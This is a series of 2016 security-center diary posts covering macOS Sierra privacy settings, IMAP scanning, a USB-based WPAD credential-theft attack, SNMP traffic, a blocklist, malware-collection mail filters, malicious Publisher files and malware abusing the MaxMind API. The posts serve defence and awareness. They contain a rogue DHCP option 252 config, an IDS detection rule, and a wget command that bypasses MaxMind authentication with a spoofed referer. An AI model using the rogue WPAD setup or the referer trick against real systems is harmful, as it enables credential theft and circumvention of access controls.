Apple is expected to release the next version of its operating system on or around September 20th, 2016 [1]. The current version of OS X, 10.11, or also known as “El Capitan” has been updated several times with various bug fixes. Currently, you should be running 10.11.6. It is possible that when Apple releases “Sierra”, another bug fix and security update will be released for “El Capitan”.

To find what version of OS X you are running, select “About this Mac” by clicking on the  logo in the upper left-hand corner.

We will cover the upgrade process only at this point. Most users will receive macOS Sierra as an Upgrade and not install it from scratch. But I bet some of the tips here apply to regular installs as well. To make this guide as generic as possible, I used a plain install of OS X El Capitan without any significant adjustments (I swapped backgrounds for a plain blue one to make the screen shots simpler).

I will not cover features that remained the same (e.g. FileVault).

The initial upgrade via the App Store is simple, and there are no options to choose. You download and install macOS Sierra and reboot your system once you are done. We start this guide after the first log-in after the upgrade.

Please only update via the App Store. Do not download macOS Sierra from any other sources. Make sure to make a full back up before you initiate the update.

If multiple users use a system, then each user has to follow the same procedure.

iCloud Credentials

After logging in, you are asked for iCloud credentials. There is an option to skip this step, but I opted for entering iCloud credentials. Many of the privacy issues with OS X are related to iCloud. But at the same time, many features are linked to iCloud. I doubt many users will disable iCloud.

iCloud Keychain

Next, you will be asked to set up iCloud Keychain. I opted against this. The iCloud Keychain will synchronize your OS X keychain across devices. You may still use the keychain locally without synchronization. According to Apple, the keychain is encrypted before it is uploaded to the cloud [2]. But anybody with access to your iCloud password will be able to access your keychain and with that, all passwords stored in your keychain. Please make sure to use a strong password and enable two-factor authentication before enabling the iCloud Keychain. Apple requires that you set-up a “Security Code” when setting up the iCloud Keychain.

iCloud Shared “Document” and “Desktop” Folder

During your first login, you are asked if you would like to store files from the “Documents” and “Desktop” folder on your iCloud drive. I opted out of this option. This feature may expose files to iCloud that you are not willing (or authorized) to share on cloud-based services.

Siri

macOS Sierra comes with Siri enabled by default. Not everybody may be comfortable with having Siri listen in. Just like on iOS, Siri uses a cloud-based service to analyze voice commands. Siri was disabled by default for me, and you can remove the Siri icon from the dock by right-clicking it and selecting “Options” => “Remove from Dock”. Siri can also be managed from a dedicated settings dialog.

To verify that Siri is disabled, check the “Siri” dialog in “System Preferences”. The “Enable Siri” checkbox should be unchecked. Siri will only listen in, and analyze sound if it is invoked by clicking on the Siri icon in the toolbar (upper right-hand corner of the screen)

Apple Watch Screen Unlock

If you own an Apple Watch, and upgraded it to WatchOS 3, then you will be able to unlock your system using your watch. Connecting your watch will only work if you have two-factor authentication enabled for your account, and your watch has to be secured with a passcode. By default, the feature is turned off. You should be able to enable the Apple Watch unlock in the “Security & Privacy” part of the Settings dialog. But lacking a compatible watch I wasn’t able to see the dialog.

Continuity / Universal Clipboard

Continuity existed in OS X El Capitan and allows sharing content between iOS and OS X devices. There is also a cross-device Clipboard to copy/paste between devices. The clipboard could expose sensitive content to other devices, for example if you copy/paste passwords from a password wallet type application. There appears to be no easy way to disable these features. For them to work, you need to link all devices to the same iCloud account, and then enable Wi-Fi as well as Bluetooth on all devices.

Optimized Storage

macOS Sierra can move files to iCloud to save disk space. For files like iTunes movies and music, which you downloaded from Apple, this is probably less of an issue. But it may also affect other files that haven’t been opened in a while. To review optimized storage settings, click on “About this Mac” in your  menu. Then select “Storage” and click on the “Manage” button. The “Recommendations” menu will allow you to turn on some of these features. To turn them off, you will need to disable them in your iCloud settings, or for the automatic trash delete, in Finder’s preferences (“Preferences” => “Advanced”)

Gatekeeper

Gatekeeper limits which applications a user may execute. OS X El Capitan had three settings: “Mac App Store”, “Mac App Store and identified developers”, and “Anywhere”. macOS Sierra lost the last option. Instead, if you try to launch an unsigned application, you need to open the “Security & Privacy” dialog, and then you will have to allow the application to run. You will only have to do this the first time you run the application. This behavior is identical to OS X El Capitan. macOS Sierra also re-labeled the options to “App Store” instead of “Mac App Store”. 

A quick way to open applications the first time is to right click on the application and selecting “Open” from the menu, instead of just double-clicking it. If you right-click and “Open”, a dialog will pop up allowing you to override the Gatekeeper configuration. The dialog will show the hostname for the website from which the application was downloaded.

Summary

The privacy and security changes in macOS Sierra come from its tighter integration with iCloud. Cloud integration is an industry wide trend and not just specific to Apple. Which documents and what data you want to share with cloud services should be carefully evaluated, and the security of cloud accounts will become more and more important. Two-factor authentication is an absolute must, no matter if it is iCloud, Dropbox or OneDrive. Traditional passwords are too easily lost in phishing attacks. Phishing attacks against cloud credentials can be very targeted and convincing. Two-Factor authentication provides some protection against these attacks.

Many of the existing security features in OS X remain the same, like for example FileVault and various other iCloud based services like “Back to my Mac”. Please consult various OS X hardening guides for advice.

[1] http://www.apple.com/macos/sierra/
[2] https://support.apple.com/en-us/HT202303

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

2 Comments

Published: 2016-09-10

Ongoing IMAP Scan, Anyone Else?

I'm operating a mail server which handles email flows from multiple domains (<20 domains). The server is under a massive IMAPS (%%port:993%%) scan for a few days. More details about the ongoing attack:

  • Some logins are valid
  • Some logins seem to be part of a dictionary
  • Some logins are old or unused (like scraped from web pages)
  • Some logins have a format 'user@domain.tld', other just the 'user'

[Update: some IP addresses are also testing SMTP AUTH]

There is a strong password policy in place and no credentials were compromized. This is not a brute-force attack, connection attempts are coming by waves. The only impact until now was a pollution of my logs!

There is an OSSEC active-response[1] with the 'repeated_offender' feature enabled (at 30, 60, 120, 240, 480 minutes) but new IP addresses are always detected (like being part of a bot):

I searched for more information about the offending IP addresses, they do not seem to belong to a known botnet. They are not Tor exit-nodes. Here is the top-10 of active IP addresses:

%%ip:155.133.82.55%%
%%ip:184.71.40.22%%
%%ip:50.39.0.12%%
%%ip:185.130.6.226%%
%%ip:119.29.229.87%%
%%ip:80.200.28.68%%
%%ip:80.82.64.102%%
%%ip:212.118.124.109%%
%%ip:139.255.51.42%%
%%ip:151.253.48.108%%

Someone else has already detected the same kind of scan?

[1] http://ossec-docs.readthedocs.io/en/latest/manual/ar/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments

Published: 2016-09-09

Collecting Users Credentials from Locked Devices

It’s a fact: When a device can be physically accessed, you may consider it as compromised. And if the device is properly hardened, it's just a matter of time. The best hacks are the ones which use a feature or the way the computer is supposed to work. To illustrate this, let's review an interesting blog post published yesterday[1]. It demonstrates how easy it is to steal credentials from a locked computer. If the attack is not new, the method used is really awesome. You probably know that computers tend to generate a lot of network request that may content sensitive information. As an example, if you specify an URL like  "file://1.2.3.4/doc.txt" in a web page, Internet Explorer will try to access the file via SMB and will disclose the current user credentials. In the new attack, no need to play with cables to sniff traffic, no MitM or altered web pages. Access to the USB port of a locked computer (read: a user being logged in but away for a coffee break) is enough.

To perform the attack, a low-cost device is required like the USB Armory [2] or the Hak5 Turtle[3], both can be connected to a host computer via USB and provide TCP/IP service via an Ethernet over USB protocol. When you connect such device into the USB port, a driver is loaded by the operating system (which does not require any user intervention), a new interface is set up and classic TCP/IP communications occur. What happens in this case? The host computer will consider this interface as the new default one for a few second and tries to configure it by requesting an IP address via DHCP.

The USB Armory is configured to provide DHCP services but with a specific option (number 252) to provide the proxy auto configuration script also called “WPAD” (“Web Proxy Autodiscovery Protocol”):

option local-proxy-config code 252 = text;

subnet 192.168.10.0 net mask 255.255.255.0 {
    ...
   option local-proxy-config “http://192.168.10.1/wpad.dat”;
}

The key point is that WPAD provided by DHCP has a higher priority than the one provided by DNS. The tool that will handle the requests and capture data is Responder[5]. A nice demonstration is available on Youtube[6]. Evil!

The next question is "how to protect against this kind of attack?". It's not easy because countermeasures may affect the computer operations or restrict users' operations. The first idea is to disable the proxy automatic settings (that can be also enforced via a GPO) but it does not prevent the host computer to make an HTTP request to the URL provided by DHCP. I tested on a Windows 10 system, disabled all the automatic configurations, rebooted and saw this on my web server:

192.168.254.222 - - [09/Sep/2016:08:26:53 +0200] "GET /wpad.dat HTTP/1.1" 200 591 "-" "WinHttp-Autoproxy-Service/5.1"

How to mitigate this attack?

Completely disabling USB port is not an option but restricting the use of some USB devices (usually HID of "Human Interface Devices") can be implemented by a GPO or a specific software.

If you don't use automatic proxy discovery, monitor your DNS logs for requests like "wpad.domain.com". The WPAD configuration over DHCP has a higher priority then DNS. However as explained by Microsoft[7]: "

"Now, if DHCP is configured to provide the WPAD location, IE stops the detection and will make a GET request for the wpad.dat file and no further searching is done. This is true even if the DHCP 252 option is incorrect and a correct entry is configured as a DNS record. Please also be aware that IE still sends out the DNS query in this situation, even the DNS result won’t be adopted."

Again, I saw this while booting my Windows 10. It tried to find valid WPAD URLs:

09-Sep-2016 08:26:54.672 queries: info: client 192.168.254.222#57683: query: wpad.xxxxx IN AAAA + (192.168.254.8)
09-Sep-2016 08:26:54.672 queries: info: client 192.168.254.222#61760: query: wpad.xxxxx IN A + (192.168.254.8)

If you don't use the DHCP option 252 in your network, a good idea is to track such feature via your IDS. Here is a Snort / Suricata rule:

alert udp any 67 -> any 68 (msg:"ET INFO Web Proxy Auto Discovery Protocol WPAD DHCP 252 option Possible BadTunnel"; content:"|02|"; depth:1; content:"|fc|"; byte_jump:1,0,relative,post_offset -9; content:"/wpad.dat"; within:9; fast_pattern; classtype:protocol-command-decode; sid:2022915; rev:1;)

(Note that this rule won't protect you against the attack described here because the DHCP traffic remains "local" but it can help you to detect a classic MitM attack)

Finally, you can track the use of devices like the USB Armory by monitoring the following registry key: HKLM\SYSTEM\CurrentControlSet\Enum\USB. Here is a screenshot (idVendor=0525 is the USB Armory):

This can be implemented with a host based IDS like OSSEC[8].

As you can see, this attack is not easy to mitigate. If you have tips to protect against such USB attack, feel free to share!

[1] https://room362.com/post/2016/snagging-creds-from-locked-machines/
[2] https://inversepath.com/usbarmory
[3] http://hakshop.myshopify.com/collections/lan-turtle/products/lan-turtle
[4] https://en.wikipedia.org/wiki/Ethernet_over_USB
[5] https://github.com/Spiderlabs/Responder
[6] https://www.youtube.com/watch?v=Oplubg5q7ao
[7] https://blogs.msdn.microsoft.com/asiatech/2012/08/14/insight-wpad-proxy-settings-on-ie/
[8] https://blog.rootshell.be/2010/03/15/detecting-usb-storage-usage-with-ossec/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

15 Comments

Published: 2016-09-08

Curious SNMP Traffic Spike

It could be nothing.  It could be something.

The ISC HoneyPot has been showing some port 161 traffic.

12:08:27.874575 IP x.x.x.x.12458 > y.y.y.y.161: GetRequest(28) .1.3.6.1.2.1.1.1.0
12:09:10.952260 IP z.z.z.z.12458 > a.a.a.a.161: GetRequest(28) .1.3.6.1.2.1.1.1.0

12:09:52.802179 IP b.b.b.b.12458 > c.c.c.c.161: GetRequest(28) .1.3.6.1.2.1.1.1.0


So I did some poking around, read some articles [1]   and found some simlarities, etc.  No real testing per se yet.  Then after yesterday's data was collected, the ISC port data showed a curious correlation.   So I am turning to our readers.  Can any of you offer any corroborating data or anecdotes.    The pic [3]   below shows a triple in sources on Aug 11 near the time when some of the recent Cisco vulnerabilities became well known. [2]    Then a similar spike yesterday.   The numbers do not entirely warrant a deep dive, however, knowing about the events surrounding port 161 from Aug 13 (or near there), there could be something to it.
















[1] http://blog.level3.com/security/shadow-brokers-hit-light-of-day/
[2] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
​[3] https://isc.sans.edu/port.html?port=161
 

​Please leave a comment if you see anything that correlates in your travels.

-Kevin

--
ISC Handler on Duty

7 Comments

Published: 2016-09-07

Updated DShield Blocklist

Earlier today, I updated how our "block list" is generated. The idea behind this is to avoid some false positives and to make the list more meaningful. As usual, please note that this list is "as is" and use it at your risk. There will likely be some false positives from time to time, and of course, your definition of "false positives" may be different than ours.

The list, like before, lists /24 networks. We found in the past that this network size provides a reasonable balance between false positives and blocking sets of known misbehaving IPs efficiently.

Networks will be de-listed on request. We will not review the request for "maliciousness". But if you know you are listed, and you ask us to remove you, we will do so as soon as possible. 

To compile the list, we rank /24 networks based on the number of targets they attack. We only include reports if we received them from multiple submitters. Some common false positives are removed and not included in the ranking.

Of course, you can make up your lists using whatever data we provide. But please be aware that the purpose of our data is research, not blocking. We do not filter data displayed on our site for false positives. It is up to you to decide what is a false positive. For example, we do include "research scans" in our data, and even in our blocklists. Some may consider this a false positive.

"Top 10" blocklist do block Internet-wide, common scans. They will not protect you from targeted scans, and they will not protect you from all scans of this type. Please understand these limitations before applying this blocklist. The block list is updated once an hour.

URL of our blocklist: https://isc.sans.edu/feeds/block.txt

For more detailed data, use our API: https://isc.sans.edu/api

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

4 Comments

Published: 2016-09-06

How to Set Up Your Own Malware Trap

I am sure what you really want is more malware ;-). But a few people asked for tricks to collect malware. Malware can be useful for a number of reasons: First of all, you could extract indicators of compromise from malware using various more or less automated methods. In addition, it is a good idea to keep an eye on what your users may be seeing, in particular, if they receive e-mail from sources other than your corporate e-mail system.

Sadly, many corporations these days switch to cloud providers for e-mail. But it can still be useful to setup a relay to pre-filter your e-mail before it hits the cloud provider to get more insight into e-mail that your cloud providers limited logs do not provide.

Personally, I am using postfix, so what I am going to talk about, will be postfix specific (and some procmail... which may be used with other mail servers). If you have similar tricks for other mail servers, then please comment.

(1) improved logging

Quite often, a user (or maybe even an AV system) may flag an e-mail as suspect. If this turns out to be a real malicious e-mail (phishing, malware...), then it is nice to be quickly able to look for other e-mails with the same subject or the same "From" address. In order to make this easier, I like to have Postfix log "From", "To" and "Subject" headers. You can easily accomplish this by adding "header check". In postfix, "header checks" can be used to filter e-mail with specific headers. But if you flag them just as a "Warning", then the header will be logged. I added the following lines to my "header_check" file to log the Subject, To, and From:

/^subject:/      WARN
/^to:/           WARN
/^from:/         WARN
/^Subject:/      WARN
/^To:/           WARN
/^From:/         WARN

 You then need to add the following line to your main.cf to use these header checks:

header_checks = regexp:/etc/postfix/header_checks 

(/etc/postfix/header_checks is the name of the file. Your's may be different)

you will now see lines like this in your maillog:

Sep  6 15:26:50 mail postfix/cleanup[24158]: 39B0D7FFA9: warning: 
 header Subject: August invoice from unknown[39.46.85.64]; 
 from=Burnett.84@corporate-change.com to=list@dshield.org proto=ESMTP helo=<[39.46.86.81]>

Next, a little procmail trick that will get rid of most of current malicious e-mail: A simple check to see if any compressed attachments include known bad extensions:

:0 B
* ^Content-Type: (application/zip|application/x-zip-compressed);
{
        :0 fbhw
        | /usr/local/bin/mime-zip-trojan.pl
}

"mime-zip-trojan.pl" is an amazingly simple perl script. You can very easily modify it to extend the extension blocklist. (I can't bring up the site for this script right now. so please trust the Google to find it for you)

The script doesn't block anything, but instead, it just adds a header to the e-mail (X-Zip-Trojan: Yes) that you can then use to filter the e-mail with additional procmail rules.

Finally, you should of course send all e-mail (including e-mail found by mime-zip-trojan.pl) through an AV scanner so you don't waste your time analyzing old malware.

One thing you SHOULD NEVER do: Send all attachments to Virustotal. Virustotal is a great service, and they offer some tools to automate submissions. But do not send anything beyond a hash, unless you are pretty sure it is malicious, and absolutely sure it is not confidential. Any files send to Virustotal are made available to researchers and others.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

2 Comments

Published: 2016-09-05

Malware Delivered via '.pub' Files

While searching for new scenarios to deliver their malwares[1][2], attackers launched a campaign to deliver malicious code embedded in Microsoft Publisher[3] (.pub) files. The tool Publisher is less known than Word or Excel. This desktop publishing tool was released in 1991 (version 1.0) but it is still alive and included in the newest Office suite. It is not surprising that it support also macros. 

By using .pub files, attackers make one step forward because potential victims don't know the extension ".pub" (which can be interpreted as "public" or "publicity" and make the document less suspicious), Spam filters do not block this type of file extension. Finally, researchers are also impacted because their sandbox environments do not have Publisher installed by default, making the sample impossible to analyze!

A sample of a malicious .pub file is already available on VT[4] with a low detection score (5/55).

Stay safe!

[1] https://isc.sans.edu/forums/diary/Voice+Message+Notifications+Deliver+Ransomware/21397/
[2] https://isc.sans.edu/forums/diary/Todays+Locky+Variant+Arrives+as+a+Windows+Script+File/21423/
[3] https://products.office.com/en/publisher
[4] https://www.virustotal.com/en/file/24441d0573c255852f28e558001883a00bc2f18816f48653d63429065d1f37fd/analysis/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 Comments

Published: 2016-09-02

Apple Patches "Trident" Vulnerabilities in OS X / Safari

About a week ago, Apple patched three vulnerabilities in iOS that had been used in a targeted exploit. This set of vulnerabilities, also known as "Trident," affected WebKit and the iOS kernel. Given the substantial code overlap between iOS and OS X, and in particular the fact that one of the vulnerabilities affected WebKit, it is no surprise that OS X and Safari are vulnerable as well.

Yesterday, Apple released a patch of OS X and Safari to address these issues.

The OS X update, which is only available for El Capitan and Yosemite, fixes the two kernel vulnerabilities. The Safari update which is available for OS X Mavericks and Yosemite (not the latest version, El Capitan), fixes the WebKit vulnerability.

I recommend patching these quickly given that the same vulnerabilities have already been exploited for iOS.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

1 Comments

Published: 2016-09-01

Maxmind.com (Ab)used As Anti-Analysis Technique

A long time ago I wrote a diary[1] about malware samples which use online geolocalization services. Such services are used to target only specific victims. If the malware detects that it is executed from a specific area, it just stops. This has been seen in Russian malware's which did not infect people located in the same area.

Today, once in the wild, malware samples are quickly intercepted and analyzed by security researchers but also big players on the security market. New anti-analysis techniques are regularly deployed to prevent the malware to execute or to change its behavior. One of the last technique discovered by McAfee[2] is the abuse of the MaxMind[3] GeoIP services. This can be implemented via a simple GET request against the Maxmind API which suffers of a lack of access control.

If you query this URL:

$ wget https://www.maxmind.com/geoip/v2.1/city/me
--2016-09-01 07:45:41--  https://www.maxmind.com/geoip/v2.1/city/me
Resolving www.maxmind.com (www.maxmind.com)... 2400:cb00:2048:1::6810:262f, 2400:cb00:2048:1::6810:252f, 104.16.38.47, ...
Connecting to www.maxmind.com (www.maxmind.com)|2400:cb00:2048:1::6810:262f|:443... connected.
HTTP request sent, awaiting response... 401 Unauthorized

Username/Password Authentication Failed.

But if you just add a good referer:

$ wget -O whereami.txt --referer=https://www.maxmind.com/en/locate-my-ip-address https://www.maxmind.com/geoip/v2.1/city/me
--2016-09-01 07:47:11--  https://www.maxmind.com/geoip/v2.1/city/me
Resolving www.maxmind.com (www.maxmind.com)... 2400:cb00:2048:1::6810:262f, 2400:cb00:2048:1::6810:252f, 104.16.38.47, ...
Connecting to www.maxmind.com (www.maxmind.com)|2400:cb00:2048:1::6810:262f|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1214 (1.2K) [application/vnd.maxmind.com-city+json]
Saving to: ‘whereami.txt’

where-am-i.txt       100%[==========================================================>]   1.19K  --.-KB/s    in 0s

2016-09-01 07:49:08 (17.1 MB/s) - ‘where-am-i.txt’ saved [1214/1214]

$ cat whereami.txt
{"country":{"names":{"pt-BR":"Bélgica","de":"Belgien","en":"Belgium","ja":"ベルギー王国","es":"Bélgica", \
"zh-CN":"比利时","ru":"Бельгия","fr":"Belgique"},"geoname_id":2802361,"iso_code":"BE"},"location" \
{"time_zone":"Europe/Brussels","accuracy_radius":100,"longitude":4.3333,"latitude":50.6},"traits": \
{"autonomous_system_organization":"BELGACOM-SKYNET-AS","ip_address":"xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx", \
"isp":"Belgacom-skynet-as", "organization":"Belgacom-skynet-as","autonomous_system_number":5432},"city": \
{"geoname_id":2790101,"names":{"en":"Nivelles","de":"Nivelles","ru":"Нивель","zh-CN":"尼韦尔", \
"fr":"Nivelles"}},"postal":{"code":"1400"},"subdivisions":[{"geoname_id":3337387, \
"names":{"pt-BR": "Valônia","fr":"Wallonie","es":"Valonia","en":"Wallonia","de":"Wallonische Region"}, \
"iso_code":"WAL"},{"iso_code":"WBR","geoname_id":3333251,"names":{"pt-BR":"Brabante Valão", \
"en":"Walloon Brabant Province","de":"Provinz Wallonisch-Brabant","es":"Brabant Wallonie", \
"fr":"Brabant Wallon"}}],"continent":{"code":"EU","names":{"pt-BR":"Europa","en":"Europe", \
"de":"Europa","ja":"ヨーロッパ","es":"Europa","fr":"Europe","zh-CN":"欧洲","ru":"Европа"}, \
"geoname_id":6255148}}

You can see that it's possible to locate me but also it reports information like the AS and the organization/ISP. Interesting strings like AV vendor names are searched by the malware but not only. If the network name contains strings like "Data Center", "VPS", "Hosting" or "Shared", they are chances that the host running the malware is not an endpoint device.

If you're performing research or investigations, always use a dedicated xDSL or cable connection!

[1] https://isc.sans.edu/forums/diary/Victim+of+its+own+success+and+abused+by+malwares/20311/
[2] https://blogs.mcafee.com/mcafee-labs/macro-malware-adds-tricks-uses-maxmind-to-avoid-detection/
[3] https://www.maxmind.com/en/geoip2-services-and-databases

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments